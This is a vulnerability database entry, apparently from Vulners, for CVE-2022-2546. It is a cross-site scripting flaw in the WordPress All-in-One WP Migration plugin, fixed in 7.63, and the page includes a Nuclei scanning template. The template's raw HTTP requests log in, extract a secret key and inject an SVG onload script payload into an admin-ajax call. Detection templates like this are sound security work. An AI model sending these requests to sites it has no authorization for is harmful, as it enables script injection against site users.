Lucene search
+L

WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting

🗓️ 08 Sep 2026 09:11:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 105 Views

WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting vulnerability allows injection of arbitrary scripts, leading to session hijacking and theft of sensitive information. Update to version 7.63 or higher to fix

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2022-2546
19 Sep 202414:05
githubexploit
circl
Circl
CVE-2022-2546
2 Feb 202312:14
circl
cnnvd
CNNVD
WordPress Plugin All-in-One WP Migration 跨站脚本漏洞
2 Feb 202300:00
cnnvd
cve
CVE
CVE-2022-2546
2 Feb 202308:28
cve
cvelist
Cvelist
CVE-2022-2546 All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS
2 Feb 202308:28
cvelist
kitploit
Kitploit
CVE-2022-2546
2 Sep 202611:45
kitploit
nuclei
Nuclei
QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
7 Sep 202606:34
nuclei
nvd
NVD
CVE-2022-2546
2 Feb 202309:15
nvd
openvas
OpenVAS
WordPress All-in-One WP Migration Plugin < 7.63 XSS Vulnerability
3 Feb 202300:00
openvas
osv
OSV
CVE-2022-2546
2 Feb 202309:15
osv
Rows per page
id: CVE-2022-2546

info:
  name: WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58
    - https://wordpress.org/plugins/all-in-one-wp-migration/
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://github.com/0xvinix/CVE-2022-2546
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2022-2546
    cwe-id: CWE-79
    epss-score: 0.01204
    epss-percentile: 0.66227
    cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: servmask
    product: all-in-one_wp_migration
    framework: wordpress
  tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(header_3, "text/html")
          - status_code_3 == 200
          - contains(body_3, '{\"new_value\":[\"XSSPAYLOAD<svg onload=alert(document.domain)>')
        condition: and

    extractors:
      - type: regex
        name: secretkey
        group: 1
        regex:
          - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
        internal: true
# digest: 4a0a00473045022100b938ec72ddd107897f41d6cfde7795168ba43a53129cd85cb7d886bfcfc3a65a02200d9d1d9c79516b24c446087c8935653d19d340ee070f781e1642dc0b26a2a260:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation